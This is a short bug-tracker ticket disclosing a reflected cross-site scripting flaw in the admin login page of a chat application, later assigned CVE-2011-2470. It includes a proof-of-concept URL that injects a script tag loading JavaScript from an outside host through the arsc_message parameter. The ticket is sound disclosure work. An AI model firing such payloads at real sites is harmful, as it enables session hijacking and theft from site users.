Menu

#48 XSS-vulnerability base/admin/login.php?arsc_message=

open
nobody
None
9
2011-06-02
2011-06-02
Henri Salo
No

Your application contains lot of input validation bugs, which lead to XSS-vulnerabilities. One example:

http://www.reallysimplechat.org/chat/base/admin/login.php?arsc_message=<SCRIPT SRC=http://example.org/xss.js></SCRIPT>

Could you go trough your application and add proper validation to the code, thank you!

Discussion

  • Henri Salo

    Henri Salo - 2011-06-02
    • priority: 5 --> 9
     
  • Henri Salo

    Henri Salo - 2011-07-24

    CVE-2011-2470 is assigned to arsc_message parameter vulnerability.

     

Log in to post a comment.

MongoDB Logo MongoDB